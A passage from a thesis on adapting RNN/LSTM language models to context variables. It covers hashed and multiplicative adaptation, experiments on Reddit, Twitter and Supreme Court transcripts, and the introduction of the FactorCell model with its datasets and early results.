22 where Ŵ = [W Q] and b′ = Qc + b is the context-dependent bias, formed by adding a linear projection of the context embedding. Thus, for this scenario where the context only changes sporadically, concatenating the context embedding with the input to the recurrent layer is the same as using a context-dependent bias vector. Some people perform the concatenation explicitly despite its inefficiencies compared to directly learning the context-dependent bias because modern deep learning libraries do not always make it easy to alter the internal workings of the RNN or LSTM. 3.2 Models We consider two methods each for adapting the recurrent and output layers respectively. In total there are 24 = 16 total possible models that can be constructed by enabling or disabling each of the four adaptations. All of the models with adaptation incorporate a context embedding c using the method described in Section 2.3.1. 3.2.1 Adapting the recurrent layer We consider two methods for adapting the recurrent layer. The first is the ConcatCell from Equation 3.1. It can be implemented by simply concatenating the context vector c with the word embedding ewt at each timestep at the input to the recurrent layer, but the effect of this adaptation is to apply a linear additive shift to the recurrent layer bias. To increase the adaptability of the hidden layer, we introduce a context-dependent multi- plicative rescaling of the hidden layer weights. The method is inspired from Ha et al. (2017), where a similar multiplicative scaling is used to dynamically adjusting the parameters of a language model in response to the previous words in the sentence. Using this row rescaling technique on top of the additive adaptation from Equation 2.4, the equation becomes ht = σ(Cc�W[ewt,ht−1] + Qc + b1) (3.2) where C ∈ Rq×k is a new model parameter and � is the elementwise multiplication operator. The element-wise multiplication is a low-cost operation and can even be pre-calculated so 23 that model evaluation can happen with no extra computation compared to a vanilla RNN. 3.2.2 Adapting the output layer One way of adapting the output layer is to let each context have its own bias vector. This requires the use of a matrix of size |V | × |C|, where |V | is the size of the vocabulary and |C| is the total number of possible contexts. This may be intractable when both |V | and |C| are large. Mikolov and Zweig (2012) use a low-rank factorization of the adaptation matrix, replacing the |V |×|C| matrix with the product of a matrix G of size |V |×k and a context embedding c of size k. yt = softmax(E Tht + Gc + b2) (3.3) The total number of parameters is now a much more manageable O(|V | + ∑ i |Ci|) instead of O( ∑ i |V ||Ci|), where Ci is the cardinality of the i-th context variable. The advantage of a low-rank adaptation is that it forces the model to share information between similar contexts. The disadvantage, is that important differences between similar contexts can be lost. We employ feature hashing to reduce the memory requirements but retain some of the benefits of having an individual bias term for each context-word pair. The context-word pairs are hashed into buckets and individual bias terms are learned for each bucket. The hashing technique relies on having direct access to the context variables f1:n. Representing context as a latent topic distribution precludes the use of this hashing adaptation. The choice of hashing function is motivated by what is easy and fast to perform inside the Tensorflow computation graph framework2. If w is a word identifier (ID) and f1:n are context variable ID’s, then the hash table index is computed as hi(w,fi) = wr0 + firi mod l (3.4) where l is the size of the hash table and r0 and the ri’s are all fixed random integers. The 2Newer versions of Tensorflow make it easier to do feature hashing than what we describe here. 24 value of l is usually set to a large prime number. The function H : Z → R maps hash indices to hash values and is implemented as a simple array. Since l is much smaller than the total number of inputs, there will be many hash collisions. Hash collisions are known to negatively effect the perplexity (Mikolov et al., 2011). To deal with this issue, we restrict the hash table to context-word pairs that are observed in the training data. A Bloom filter data structure records which context-word pairs are eligible to have entries in the hash table. The design of this data structure trades off a compact representation of set membership against a small probability of false positives (Bloom, 1970; Talbot and Brants, 2008; Xu et al., 2011). A small amount of false positives is relatively harmless in this application, because they do not impair the ability of the Bloom filter to eliminate almost all of the hash collisions. The function β : Z → [0, 1] is used by the Bloom filter to map hash indices to binary values. B(w,fi) = 16∏ j=1 β(hi,j(w,fi)) The hash functions hi,j are defined in the same way as the hi’s above except that they use distinct random integers and the size of the table, l, can be different. Because β is a binary function, the product B(w,fi) will always be zero or one. Thus, any word-context pairs not found in the Bloom filter will have their hash values set to zero. The final expression for the hashed adaptation term is given by Hash(w,f1:n) = n∑ i=1 H(hi(w,fi))B(w,fi) (3.5) yt = softmax(E Tht + Gc + b2 + Hash(wt,f1:n)) (3.6) 3.3 Data The experiments make use of three corpora chosen to give a diverse perspective on adaptation in language modeling. Summary information on the training set for each source (Reddit, Twitter, and SCOTUS) is provided in Table 3.1 and each source is discussed individually 25 Source Size Vocabulary Context (Dimensions) Reddit 8,000K 68,000 words Subreddit (5800) Twitter 77K 194 chars Language (9) SCOTUS 864K 18,000 words Case (1765), Speaker (2276), Role (3) Table 3.1: Number of sentences, vocabulary size and context variables for the three corpora. below. The Reddit and SCOTUS data are tokenized and lower-cased using the standard NLTK tokenizer (Bird et al., 2009). Reddit Reddit is the world’s largest online discussion forum and is comprised of thousands of active subcommunities dedicated to a wide variety of themes. Our training data is 8 million sentences (100 million words) from Reddit comments during the month of April 2015. Only the first sentence from each comment was used. The 68,000 word vocabulary is selected by taking all tokens that occur at least 20 times in the training data. The remaining tokens are mapped to a special UNK token leaving us with an out of vocabulary rate of 2.3%. The validation data and test data are each contain one eighth the number of sentences as the training data. The context variable is the identity of the subreddit, i.e. community, that the comment came from. There are 5,800 subreddits with at least 50 training sentences. The remaining ones are grouped together in an UNK category. The largest subreddit occupies just 4.5% of the data. By using a large number of subreddits, we highlight an advantage of model adaptation which is to be able to use a single unified model instead of training thousands of separate models for each individual community. Similarly, using context dependent bias vec- tors for this data instead of the hash adaptation would require learning 400 million additional parameters. 26 Twitter The Twitter training data has 77,000 Tweets (848,000 words) each annotated with one of nine languages: English, German, Italian, Spanish, Portuguese, Basque, Catalan, Galician, and French. The corpus was collected by combining resources from published data for language identification tasks during the past few years. Tweets labeled as unknown, ambiguous, or containing code-switching were not included. The data is unbalanced across languages with more than 32% of the Tweets being Spanish and the smallest four languages (Italian, German, Basque, and Galician) each representing less than 1.5% of the total. There are 194 unique character tokens in the vocabulary. Graphemes that are surrogate-pairs in the UTF-16 encoding, such as emoji, are split into multiple vocabulary tokens. No preprocessing or tokenization is performed on this data except that newlines were replaced with spaces for convenience. The validation and test data have 12,000 and 15,000 Tweets respectively. SCOTUS Approximately 864,000 utterances (16 million words) of training data spanning arguments from 1990-2011. These are speech transcripts from arguments before the United States Supreme Court. Utterances are labeled with the case being argued (n=1,765), the speaker ID (n=2,276), and the speaker role (justice, advocate, or unidentified). These three context variables are defined in the same way as in Hutchinson et al. (2013), where a small portion of this data was used in language modeling experiments. The vocabulary size is around 18,000 words. Utterances longer than 45 words (90th percentile) were split into smaller utterances.3 The validation and test data were each one eighth the size of the training data. 3.4 Experiments We used an LSTM with coupled input and forget gates for a 20% reduction in computation time (Greff et al., 2016). Dropout was used as a regularizer on the input and outputs of the recurrent layer as described in Zaremba et al. (2014). For the large vocabulary experiments, 3Occasionally, the advocates go on for hundreds of words without interruption. Including these utterances would slow down the training. 27 Parameter Reddit SCOTUS Twitter Batch Size 400 300 200 Word Embed. 200 200 30 LSTM Size 240 240 200 Dropout 0% 15% 10% Neg. Samples 100 100 NA Total Params. 14M 4M 300K Table 3.2: Summary of Key Hyperparamters we used a sampled softmax loss to speed up training. A summary of the key hyperparameters for each class of experiments is given in Table 3.2. We conducted some preliminary experiments to tune the different hyperparameters for each dataset. Then, we fixed the values of these hyperparameters and only varied the adaptation method in each experiment. The total parameter column in this table is based on the unadapted model. Adapted models will have more parameters depending on the type of adaptation. When using hash adaptation of the output layer, the size of the Bloom filter is 100 million and the size of the hash table is 80 million. The model is implemented using the Tensorflow library. Optimization is done using Adam with a learning rate of 0.001. Each model trained in under three days using 8 CPU threads. Although the model is trained as a language model, it can be used as a generative text classifier. The classification rule is given by argmaxfi ∑ j log p(wj|w1:j−1,ck 6=i,fi). When there are multiple context variables, we treat all but one of them as known values and attempt to identify the unknown one. It is not necessary to compute the probabilities over the full vocabulary to do text classification. The sampled softmax criteria can be used to greatly speed up evaluation of the classifier provided that a) the same negative samples are reused for each class and b) the number of negative samples is increased to around 10% of the vocabulary. 28 Hidd. Output × + LR Hash PPL ∆PPL AUC N N N N 75.2 – – N N N Y 69.6 7.3% 76.5 N N Y N 68.0 9.5% 75.5 N N Y Y 66.9 11.0% 78.4 N Y N N 68.4 9.0% 76.1 N Y N Y 66.9 11.0% 78.9 N Y Y N 68.0 9.6% 75.3 N Y Y Y 66.5 11.5% 78.4 Y N N N 69.4 7.7% 75.9 Y N Y N 68.8 8.5% 75.9 Y N Y Y 67.2 10.6% 78.9 Y Y N N 69.0 8.2% 76.7 Y Y N Y 67.5 10.2% 79.0 Y Y Y N 68.3 9.1% 75.7 Y Y Y Y 67.1 10.7% 79.2 Table 3.3: Perplexities and Classification Avg. AUCs for Reddit Models 3.4.1 Reddit Experiments The size of the subreddit embeddings was set to 25. Table 3.3 gives the perplexities and average AUCs for subreddit detection for different adapted models. The evaluation data contains 60,000 sentences. For comparison, an unadapted 4-gram Kneser-Ney model trained on the same data has a perplexity of 119. The models with the best perplexity do not use multiplicative adaptation of the hidden layer, but it is useful in the detection experiments. We can inspect the context embeddings learned by the model to see if it is exploiting sim- 29 Pittsburgh Python NBA Atlanta CSharp Warriors Montana JavaScript Rockets MadisonWI CPP Questions Mavericks Baltimore CPP NBASpurs Table 3.4: Nearest neighbors to selected subreddits in the context embedding space. ilarities between subreddits in the way that we expect. Table 3.4 lists the nearest neighbors by Euclidean distance to three selected subreddits. The nearest neighbors are intuitively reasonable. For example, the closest subreddits to Pittsburgh are communities created for other big cities and states. The Python subreddit is close to other programming language communities, and the NBA subreddit is close to the communities for individual NBA teams. The number of subreddits is large enough that apply a generative classifier to the full set is impractical. We used a smaller subset of subreddit and to avoid bias picked the same ones used in another study (Tran and Ostendorf, 2016). This caused the classification task to turn into a detection one and therefore the decision rule is slightly different from what was described above. The subreddit detection involves predicting the subreddit a given comment came from with eight subreddits to choose from (AskMen, AskScience, AskWomen, Atheism, ChangeMyView, Fitness, Politics, and Worldnews) and nine distractors (Books, Chicago, NYC, Seattle, ExplainLikeImFive, Science, Running, NFL, and TodayILearned). To make a classification decision we evaluate the perplexity of each comment under the assumption that it belongs to each of the eight subreddits. We use z-score normalization across the eight perplexities to create a score for each class. The predictions are evaluated by averaging the AUC of the eight individual ROC curves. The best model for the classification task uses all four types of adaptation. The multiplicative adaptation of the hidden layer is clearly useful for classification even though it does not help with perplexity. The perplexities for selected large subreddits are listed in Table 3.5. It can be seen that 30 the relative gain from adaptation is largest when the topic of the subreddit is more narrowly focused. The biggest gains were achieved for subreddits dedicated to specific sports, TV shows, or video games. Whereas, the gains were smallest for subreddits like Videos or Funny for which the content tends to be more diverse. The knowledge that a sentence came from a pro-wrestling subreddit effectively provides more information about the text than the analogous piece of knowledge for the Pics or Videos subreddit. This would seem to indicate that further gains could be possible if additional contextual information could be provided. An alternative explanation, that subreddits with fewer sentences in the training data receive more benefit from adaptation, is not supported by the data. 3.4.2 Twitter experiments The Twitter evaluation was done on a set of 14,960 Tweets. The language context embedding vector dimensionality was set to 8. When both the vocabulary and the number of contexts are small, as in this case, there is no danger of hash collisions. We disable the Bloom filter making the hash adaptation essentially equivalent to having context-dependent bias vectors. Table 3.6 reports the results of the experiments on the Twitter corpus. We compute both the perplexity and measure the performance of the models on a language identification task. In terms of perplexity, the best models do not make use of the multiplicative hidden layer adaptation, consistent with the results from the Reddit corpus. In general, the improvement in perplexity from adaptation is small (less than 5%) on this corpus compared to our other experiments where we saw relative improvements two to four times as big. This is likely because the LSTM can figure out by itself which language it is modeling early on in the sequence, capture that in the hidden state, and adjust its predictions accordingly. Our best model, using multiplicative adaptation of the hidden layer, achieves an accuracy of 94.2% on this task. That is a 19% relative reduction in the error rate from the best model without multiplicative adaptation. Sometimes there can be little to no perplexity improvement between the unadapted and adapted models. This can be explained if the provided context variables are mostly redundant 31 Subreddit Base. PPL Adapt. PPL ∆PPL Description FlashTV 90.5 68.2 24.6% A popular TV show shield 99.4 77.3 22.2% A tv show GlobalOffensive 97.1 79.3 18.3% A PC video game nba 103.3 86.4 16.3% National Basketball Association SquaredCircle 85.7 71.7 16.3% Professional Wrestling Fitness 50.1 42.3 15.5% Exercise and fitness hockey 85.5 72.4 15.2% Professional hockey leagueoflegends 71.1 61.0 14.3% A PC video game pcmasterrace 71.7 62.0 13.5% PC gaming nfl 84.2 74.0 12.2% National Football League AskWomen 62.1 55.3 10.9% Questions for women news 70.8 65.0 8.2% General news stories and discussion worldnews 85.7 79.7 7.1% Global news discussion AskMen 69.4 66.7 3.9% Questions for men gaming 79.0 76.1 3.7% General video games interest group pics 74.0 71.8 3.0% Funny or interesting pictures videos 62.9 61.1 2.9% Funny or interesting videos funny 72.6 70.8 2.5% Sharing humorous content Table 3.5: Comparison of perplexities per subreddit 32 Hidden Output × + LR Hash PPL Acc. F1 N N N N 6.44 – – N N N Y 6.43 56.1 44.0 N N Y N 6.37 49.7 36.6 N N Y Y 6.34 57.0 44.5 N Y N N 6.23 91.6 84.2 N Y N Y 6.25 92.5 84.4 N Y Y N 6.21 91.4 82.9 N Y Y Y 6.15 92.8 85.2 Y N N N 6.90 93.9 85.6 Y N N Y 6.39 93.6 85.9 Y N Y N 6.28 93.2 85.1 Y N Y Y 6.31 93.7 86.1 Y Y N N 6.28 92.5 84.7 Y Y N Y 6.30 93.7 86.3 Y Y Y N 6.54 94.2 86.3 Y Y Y Y 6.35 93.3 85.9 Table 3.6: Results on Twitter data. 33 given the previous tokens in the sequence. To investigate this further, we trained a logistic regression classifier to predict the language using the state from the LSTM at the last time step on the unadapted model as a feature vector. Using just 30 labeled examples per class it is possible to get 74.6% accuracy. Furthermore, we find that a single dimension in the hidden state of the unadapted model is often enough to distinguish between different languages even though the model was not given any supervision signal. This finding is consistent with previous work that showed that individual dimensions of LSTM hidden states can be strong indicators of concepts like sentiment (Karpathy et al., 2015; Radford et al., 2017). Figure 3.1 visualizes the value of the dimension of the hidden layer that is the strongest indicator of Spanish on three different code-switched tweets. Code-switching is not a part of the training data but it provides a compelling visualization of the ability of the unsupervised model to quickly recognize the language. The fact that it is so easy for the unadapted model to pick-up on the identity of the contextual variable fits with our explanation for the small relative gain in perplexity from the adapted models in these two tasks. Figure 3.1: The value of the dimension of the LSTM hidden state in an unadapted model that is the strongest indicator for Spanish text for three different code-switched Tweets. 34 3.4.3 SCOTUS experiments Table 3.7 lists the results for the experiments on the SCOTUS corpus. The size of the context embeddings are 9, 15, and 8 for the case, speaker, and role variables respectively. For calculating perplexity we use a 60,000 sentence evaluation set. For the classification experiment we selected 4,000 sentences from the test data from eleven different justices and attempted to classify the identity of the justice. The perplexity of the distribution of judges over those sentences is 8.9 (11.0 would be uniform). So, the data is roughly balanced. When classifying justices, the model is given the case context variable, but we do not make any special effort to filter candidates based on who was serving on the court during that time, i.e. all eleven justices are considered for every case. For both the perplexity and classification metrics, the hash adaptation makes a big dif- ference. The model that uses only hash adaptation and no hidden layer adaptation has a better perplexity than any of the model variants that use both hidden adaptation and low-rank adaptation of the output layer. To ascertain which of the context variables have the most impact, we trained additional models with using different combinations of context variables. The model architecture is the one that uses all four forms of adaptation. Results are listed in Table 3.8. The most useful variable is the indicator for the case. The role variable is highly redundant—almost every speaker only appears in a single role. Therefore, it is not surprising that the speaker variable is more useful to the model than the role. In Table 3.9 we list sentences generated from the fully adapted model (same one as the last line in Table 3.7) using beam search. The value of the context variable for the Case is held fixed while we explore different values for the Speaker and Role variables. Anecdotally, we see that the model captures some information about John Roberts role as chief justice. The model learns that Justice Breyer tends to start his questions with the phrase “I mean” while Justice Kagan tends to start with “Well”. Roberts and Kagan appear in our data both as justices and earlier as advocates. 35 Hidden Output × + LR Hash PPL ∆PPL ACC N N N N 37.3 – – N N N Y 31.2 16.5% 29.6 N N Y N 32.9 12.0% 26.2 N N Y Y 30.0 19.6% 28.4 N Y N N 33.2 11.0% 20.0 N Y N Y 29.9 19.8% 26.8 N Y Y N 32.7 12.4% 25.4 N Y Y Y 29.8 20.3% 31.1 Y N N N 33.3 10.7% 17.1 Y N N Y 29.8 20.1% 28.4 Y N Y N 32.3 13.4% 24.5 Y N Y Y 29.2 21.7% 32.4 Y Y N N 33.2 11.0% 18.9 Y Y N Y 29.8 20.1% 29.6 Y Y Y N 32.2 13.7% 26.1 Y Y Y Y 29.4 21.1% 31.9 Table 3.7: Results on the SCOTUS data in terms of perplexity and classification accuracy (ACC) for the justice identification task. 36 Case Spkr. Role PPL N N N 37.3 N N Y 36.5 N Y N 33.6 N Y Y 33.3 Y N N 31.5 Y N Y 30.3 Y Y N 29.6 Y Y Y 29.4 Table 3.8: Perplexities for different combinations of context variables on the SCOTUS corpus. Spkr. Role Sentence Roberts J. We’ll hear argument first this morning in Ayers. Breyer J. I mean, I don’t think that’s right. Kagan J. Well, I don’t think that’s right. Kagan A. Mr. Chief Justice, and may it please the court: Bork A. --No, I don’t think so, your honor. Table 3.9: Sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts. 37 3.5 Comparison to Related Work The multiplicative rescaling of the recurrent layer weights is used in the Hypernetwork model (Ha et al., 2017). The focus of this model is to allow the LSTM to adjust automatically depending on the context of the previous words. This is different from our work in that we are adapting based on contextual information external to the word sequence. Gangireddy et al. (2016) also use a rescaling of the hidden layer for adaptation but it is done as a fine-tuning step and not during training like our model. The RNNME model from Mikolov et al. (2011) uses feature hashing to train a maximum entropy model alongside an RNN language model. The setup is similar to our method of using hashing to learn context-dependent biases. However, there are a number of differences. The motivation for the RNNME model was to speedup training of the RNN, not to compen- sate for the inadequacy of low-rank output layer adaptation, which had yet to be invented. Furthermore, Mikolov et al. (2011) do not use context dependent features in the max-ent component of the RNNME model, nor do they have a method for dealing with hash collisions such as our use of Bloom filters. The idea of having one part of a language model be low-rank and another part to be an additive correction to the low-rank model has been investigated in other work (Eisenstein et al., 2011b; Hutchinson et al., 2013; Parikh et al., 2014). In both of these cases, the correction term is encouraged to be sparse by including an L1 penalty. Our implementation did not promote sparsity in the hash adaptation features but this idea is worth further consideration.4 The hybrid LSTM and count based language model is an alternative way of correcting for a low-rank approximation (Neubig and Dyer, 2016). 3.6 Summary While our results suggest that there is not a one-size-fits-all approach to language model adaptation, it is clear that we improve over the standard adaptation approach. The model 4See Appendix A for a deeper look at this idea. 38 from Mikolov and Zweig (2012), equivalent to using just additive adaptation on the hidden layer and low-rank adaptation of the output layer, is outperformed for all three datasets at both the language modeling and classification tasks. The combined low-rank and hash adaptation of the output layer were consistently required to get the best perplexity. For the classification tasks, the multiplicative hidden layer adaptation is clearly useful, as is the combined low-rank and hash adaptation of the output layer. Importantly, there is not always a strong relationship between perplexity and classification scores. Our results may have implications for work on text generation where it can be more desirable to have more control over the generation rather than the lowest perplexity model. This issue is explored further in Chapter 6. Our investigation of the language context in the Twitter experiments gives a useful take- away: context variables that are easily predictable from the text alone are unlikely to be helpful. More studies are needed to get a more complete understanding about what types of context variables will provide the most benefit. To that end, additional contexts are explored in subsequent chapters. Based on the results from the SCOTUS experiments, we know that an additive transfor- mation of the bias by itself is not always the best way to adapt the recurrent layer. This motivated us to look for a new approach that would give more consistent perplexity gains so that we could be confident recommending its use in most situations. Further investigation led us to develop the FactorCell model, which is the subject of the next chapter. 39 Chapter 4 FACTOR CELL MODEL In this chapter we introduce the FactorCell model for adapting the recurrent layer of an RNN language model.1 This is a major contribution of the thesis. Instead of taking context as an additional input to the model, we conceive of adaptation in a totally new way where the model generates a custom recurrent layer for any context. This is accomplished using a low-rank decomposition in order to control the extent of parameter sharing between contexts, which is important for handling high-dimensional, sparse contexts. The experiments in this chapter will show that the FactorCell improves perplexity and that it also has qualitative differences that set it apart from other models. The FactorCell model generalizes the ConcatCell and remedies one of its major weak- nesses. When there is a large amount of data available per context then there is less need to share information between contexts. Likewise, where there are many contexts and less training data per context it is better to do more parameter sharing. The ConcatCell is not able to trade-off between these scenarios. It always shares almost all of its parameters across contexts. In contrast, the FactorCell rank hyperparameter allows complete control over how much sharing there is between contexts. Aside from perplexity, computation cost is always a consideration. A reliable and easy way to reduce perplexity is to increase the recurrent layer dimension. In latency-constrained applications (most industry speech recognition systems have strict latency constraints), the recurrent state dimension is limited. By design, the FactorCell permits pre-computation and caching so that its overall computational cost is negligibly more than the much simpler ConcatCell. All of the benefits of more adaptation are delivered with no extra latency. 1This chapter draws on content from some of our previously published work (Jaech and Ostendorf, 2018a). 40 The FactorCell is an alternative to the multiplicative transform explored in Chapter 3, which has the advantage of dedicating more parameters to the adaptation and affecting a bigger change on the recurrent layer weights. Unlike the multiplicative transform, we find that the FactorCell model consistently improves perplexity. 4.1 FactorCell Model Our model uses adaptation in both the recurrent layer and in the bias vector of the output layer. In this section we describe methods for adapting the recurrent layer and the softmax layer, showing that our proposed model is a generalization of most prior methods. 4.1.1 Adapting the recurrent layer Our proposed model extends the ConcatCell by using a context-dependent weight matrix W′ = W + A, in place of the generic weight matrix W. (We refer to W as generic because it is shared across all context settings.) The adaptation matrix, A, is generated by taking the product of the context embedding vector against a set of left and right basis tensors to produce a rank r matrix. The left and right adaptation basis tensors are given as ZL ∈ Rk×(p+q)×r and ZR ∈ Rr×q×k. The two basis tensors together can be thought of as holding k different rank r matrices, Aj = ZL,jZR,j, each the size of W. By taking the product between c and the corresponding tensor modes of ZL and ZR (using ×i to denote the mode-i tensor product, i.e., the product with the i-th dimension of the tensor), the context determines the weighted combination of the k matrices: A = (c×1 ZL)(ZR ×3 cᵀ). (4.1) (Figure 4.1 is a visualization of the FactorCell architecture.) The number of degrees of freedom of A is controlled by the dimension k of the context vector and the rank r of the k weight matrices. The rank is treated as a hyperparameter and controls the extent to which the model relies on the generic weight matrix W versus behaves in a more context-specific manner. 41 Figure 4.1: Illustration of the FactorCell architecture. We call this model the FactorCell because the weight matrix has been adapted by adding a factored component. The ConcatCell model is a special case of the FactorCell where ZL and ZR are set to zero. In summary, the proposed model is given by: ht = σ(W ′[ewt,ht−1] + b ′ 1) W′ = W + (c×1 ZL)(ZR ×3 c) b′1 = Qc + b1. (4.2) If the context is known in advance, W′ can be precomputed, in which case applying the RNN at test time requires no more computation than using an unadapted RNN of the same size. This means that for a fixed sized recurrent layer, the FactorCell model can have many more parameters than the ConcatCell model but hardly any increase in computational cost. When adapting with the FactorCell method, we find it necessary to also include the shift of the bias in the softmax output as described in Equation 2.6. 4.1.2 LSTM FactorCell Equations Only trivial changes are needed to use the FactorCell method on an LSTM instead of a vanilla RNN. Here, we list the equations for an LSTM with coupled input and forget gates, which is what was used in our experiments. The weight matrix W from Equation 2.2 is now size 3q × (p + q) and b is dimension 3q, where 3 is the number of gates. Likewise, ZR from Equation 4.1 is made to be of size 42 r × 3q × k. The weight matrix W′ is as defined in Equation 4.2 and after computing its product with the input [wt,ht−1], the result is split into three vectors of equal size: it, ft, and ot [it,ft,ot] = W ′[ewt,ht−1] + b1, (4.3) which are used in the input gate, the forget gate, and the output gate, respectively. Using these three vectors we perform the gating operations to compute ht using the memory cell mt as follows: ft ← sigmoid(ft + 1.0) mt = mt−1 �ft + (1.0 −ft) � tanh(it) ht = tanh(mt) � sigmoid(ot) (4.4) Note that Equation 3.1, which shows that a context vector concatenated with input is equivalent to an additive bias term, extends to equation 4.3. In other words, in the LSTM version of the ConcatCell model, the context vector effectively introduces an extra bias term for each of the three gates. 4.2 Data Name Train Dev Test Vocab Docs. Context AGNews 4.6M 0.2M 0.3M 54,492 115K 4 Newspaper sections DBPedia 28.7M 0.3M 3.6M 84,341 555K 14 Entity categories TripAdvisor 127.2M 2.6M 2.6M 88,347 843K 3.5K Hotels/5 Sentiment Yelp 91.5M 0.7M 7.1M 57,794 645K 5 Sentiment EuroTwitter∗ 5.3M 0.8M 1.0M 194 80K 9 Languages GeoTwitter∗ 51.7M 2.2M 2.2M 203 604K Latitude & Longitude Table 4.1: Dataset statistics: Dataset size in words (* or characters) of Train, Dev and Test sets, vocabulary size, number of training documents, and context variables. 43 The experiments make use of six datasets: four targeting word-level sequences, and two targeting character sequences. The character studies are motivated by the growing interest in character-level models in both speech recognition and machine translation (Hannun et al., 2014; Chung et al., 2016). By using multiple datasets with different types of context, we hope to learn more about what makes a dataset amenable to adaptation. The datasets range in size from over 100 million words of training data to 5 million characters of training data for the smallest one. When using a word-based vocabulary, we preprocess the data by lowercasing, tokenizing and removing most punctuation. We also truncate sentences to be shorter than a maximum length of 60 words for AGNews and DBPedia and 150 to 200 tokens for the remaining datasets. Summary information is provided in Table 4.1, including the training, development, and test data sizes in terms of number of tokens, vocabulary size, number of training documents (i.e. context samples), and the context variables (f1:n). The largest dataset, TripAdvisor, has over 800 thousand hotel review documents, which adds up to over 125 million words of training data. The first three datasets (AGNews, DBPedia, and Yelp) have previously been used for text classification (Zhang et al., 2015). These consist of newspaper headlines, encyclopedia entries, and restaurant and business reviews, respectively. The context variables associated with these correspond to the newspaper section (world, sports, business, sci & tech) for each headline, the page category on DBPedia (out of 14 options such as actor, athlete, building, etc.), and the star rating on Yelp (from one to five). For AgNews, DBPedia, and Yelp we use the same test data as in previous work. Our fourth dataset, from TripAdvisor, was previously used for language modeling and consists of two relevant context variables: an identifier for the hotel and a sentiment score from one to five stars (Tang et al., 2016). Some of the reviews are written in French or German but most are in English. There are 4,333 different hotels but we group all the ones that do not occur at least 50 times in the training data into a single entity, leaving us with around 3,500. These four datasets use word-based vocabularies. We also experiment on two Twitter datasets: EuroTwitter and GeoTwitter. EuroTwitter 44 is the same as the Twitter data used in the previous chapter and consists of 80 thousand Tweets labeled with one of nine languages: (English, Spanish, Galician, Catalan, Basque, Portuguese, French, German, and Italian). The corpus was created by combining portions of multiple published datasets for language identification including Twitter70 (Jaech et al., 2016), TweetLID (Zubiaga et al., 2014), and the monolingual portion of Tweets from a code- switching detection workshop (Molina et al., 2016). The GeoTwitter data contains Tweets with latitude and longitude information from England, Spain, and the United States.2 The latitude and longitude coordinates are given as numerical inputs. This is different from the other five datasets that all use categorical context variables. 4.3 Experiments with Different Contexts The goal of the experiments is to show that the FactorCell model can deliver improved performance over current approaches for multiple language model applications and a variety of types of contexts. Specifically, results are reported for context-conditioned perplexity and generative model text classification accuracy, using contexts that capture a range of phenomena and dimensionalities. Test set perplexity is the most widely accepted method for evaluating language models, both for use in recognition/translation applications and generation. It has the advantage that it is easy to measure and is widely used as a criterion for model fit, but the limitation that it is not directly matched to most tasks that language models are directly used for. Text classification using the model in a generative classifier is a simple application of Bayes rule: ω̂ = arg max ω p(w1:T |ω)p(ω) (4.5) where w1:T is the text sequence, p(ω) is the class prior, which we assume to be uniform. Classification accuracy provides additional information about the power of a model, even if it is not being designed explicitly for text classification. Further, it allows us to be able to directly compare our model performance against previously published text classification 2Data was accessed from http://followthehashtag.com. 45 benchmarks. Although the most effective models for text classification have generally been discriminative, generative models can be competitive when the available training data is small or text samples are short (Yogatama et al., 2017), and we find that the FactorCell makes the generative model more competitive. Note that the use of classification accuracy for evaluation here involves counting errors associated with applying the generative model to independent test samples. This differs from the accuracy criterion used for evaluating context-sensitive language models for text generation based on a separate discriminative classifier trained on generated text (Ficler and Goldberg, 2017; Hu et al., 2017). We discuss this further in Section 4.5 and Chapter 6. The experiments compare the FactorCell model (equations 4.2 and 2.6) to two popular alternatives, which we refer to as ConcatCell (equations 2.5 and 2.6) and SoftmaxBias (equa- tion 2.6). As noted earlier, the SoftmaxBias method is a simplification of the ConcatCell model, which is in turn a simplification of the FactorCell model. The SoftmaxBias method impacts only the output layer and thus only unigram statistics. Since bag-of-word models provide strong baselines in many text classification tasks, we hypothesize that the Soft- maxBias model will capture much of the relative improvement over the unadapted model for word-based tasks. However, in small vocabulary character-based models, the unigram dis- tribution is unlikely to carry much information about the context, so adapting the recurrent layer should become more important in character-level models. We expect that performance gains will be greatest for the FactorCell model for sources that have sufficient structure and data to support learning the extra degrees of freedom. Another possible baseline would use models independently trained on the subset of data for each context. This is the “independent component” case in (Yogatama et al., 2017). This will fail when a context variable takes on many values (or continuous values) or when training data is limited, because it makes poor use of the training data, as shown in that study. While we do have some datasets where this approach is plausible, we feel that its limitations have been clearly established. 46 4.3.1 Implementation Details The RNN variant that we use is an LSTM with coupled input and forget gates (Melis et al., 2018). The different model variants are implemented3 using the Tensorflow library. The model is trained with the standard negative log likelihood loss function, i.e. minimizing cross entropy. Dropout was used as a regularizer in the recurrent connections (Semeniuta et al., 2016). Training is done using the Adam optimizer with a learning rate of 0.001. For the models with word-based vocabularies, a sampled softmax loss is used with a unigram proposal distribution and sampling 150 words at each time-step (Jean et al., 2014). The classification experiments use a sampled softmax loss with a sample size of 8,000 words. This is an order of magnitude faster to compute with a minimal effect on accuracy. AgNews DBPedia EuroTwtr GeoTwtr Trip Yelp Word Embed 150 114-120 35-40 42-50 100 200 LSTM dim 110 167-180 250 250 200 200 Steps 4.1-5.5K 7.5-8.0K 6.0-8.0K 6.0-11.1K 8.4-9.9K 7.2-8.8K Dropout 0.5 1.00 0.95-1.00 0.99-1.00 0.97-1.00 1.00 Ctx. Embed 2 12 3-5 8-24 20-30 2-3 Rank 12 19 2 20 12 9 Table 4.2: Selected hyperparameters for each dataset. When a range is listed it means that a different values were selected for the FactorCell, ConcatCell, SoftmaxBias or Unadapted models. Hyperparameter tuning was done based on minimizing perplexity on the development set and using a random search. Hyperparameters included word embedding size e, recurrent state size d, context embedding size k, and weight adaptation matrix rank r, the number of training steps, recurrent dropout probability, and random initialization seed. We conducted more than 700 tuning experiments with iterative refinements. The number of experiments 3Code available at http://github.com/ajaech/calm. 47 per dataset vaires between 74 and 190. The selected hyperparameter values are listed in Table 4.2. For any fixed LSTM size, the FactorCell has a higher count of learned parameters compared to the ConcatCell. However, during evaluation both models use approximately the same number of floating-point operations because W′ only needs to be computed once per sentence. Because of this, we believe limiting the recurrent layer cell size is a fair way to compare between the FactorCell and the ConcatCell. 4.3.2 Word-based Models AGNews DBPedia TripAdvisor Yelp Model PPL ACC PPL ACC PPL ACC PPL ACC Unadapted 96.2 – 44.1 – 51.6 – 67.1 – SoftmaxBias 95.1 90.6 40.4 95.5 48.8 51.9 66.9 51.6 ConcatCell 93.8 89.7 39.5 97.8 48.3 56.0 66.8 56.9 FactorCell 92.3 90.6 37.7 98.2 48.2 58.2 66.2 58.8 Table 4.3: Perplexity and classification accuracy on the test set for the four word-based datasets. Perplexities and classification accuracies for the four word-based datasets are presented 